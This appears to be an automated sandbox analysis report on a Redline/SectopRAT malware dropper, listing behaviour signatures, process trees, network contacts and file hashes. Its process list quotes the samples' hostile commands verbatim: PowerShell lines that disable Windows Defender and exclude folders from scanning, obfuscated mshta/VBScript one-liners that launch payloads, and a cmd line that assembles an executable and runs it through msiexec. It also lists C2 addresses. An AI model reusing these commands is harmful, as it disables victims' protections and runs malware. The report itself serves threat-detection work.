| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1424 set thread context of 1528 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe |
| PID 2256 set thread context of 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe |
| PID 1784 set thread context of 2860 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0983917533e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe
Wed091bab77a3bb62d.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0944361c3621a67a6.exe
Wed0944361c3621a67a6.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe
Wed090db89ca4c58.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe
Wed0983917533e.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe
Wed0900caa0501dc98f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe
Wed09ed6b36e57df5f.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 272
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe
Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe
Wed09d761ab4704dd931.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe
Wed09f69eef9c0d5b.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe
Wed09755e77ed017e8af.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe
Wed09c4c0c3d01.exe
C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$3017E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$40166,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed090db89ca4c58.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 464
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | wensela.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| N/A | 127.0.0.1:49285 | tcp | |
| N/A | 127.0.0.1:49287 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
| MD5 | b742c566607929a9735af5c299846051 |
| SHA1 | 09be99b3b9d2d7c834f1018fa431be9a40f30c87 |
| SHA256 | cdea7bfa75a3bc43c888e945754e11ff3d9db4ad5348898a751e5bc274f4cde7 |
| SHA512 | 33aa9956aec500a3c398bcea53624754bd8d5db4b0ed5e8552269c8f2f37a379041eeda0d7155124ac780dd46944e0bc968db875d1fac6d32544b781b07d7188 |
memory/1660-56-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1660-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5358IQKJBN6KCLP314H1.temp
| MD5 | d52e24ca7714485c44c0039c722dab94 |
| SHA1 | 475cff02c9e8c906b4334c5dbd6f8685ae4ef483 |
| SHA256 | 362809722710375ea7fa946914e168170a7fb63fd224679c36c7123e09878386 |
| SHA512 | 08ae298c717f268c8339ef96b816363a4f8f2c1a1309209e4b6e40c6e53a338722a71bf7b824cd9d66746cb68e2ed86878259a2b0da1c179c3dd619f07b86ebe |
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe
| MD5 | 6b4f4e37bc557393a93d254fe4626bf3 |
| SHA1 | b9950d0223789ae109b43308fcaf93cd35923edb |
| SHA256 | 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d |
| SHA512 | a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e |
memory/1784-132-0x00000000008D0000-0x0000000000942000-memory.dmp
memory/2256-133-0x0000000001080000-0x00000000010F0000-memory.dmp
memory/2416-137-0x0000000000F40000-0x0000000000F48000-memory.dmp
memory/2260-152-0x00000000003E0000-0x00000000003E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
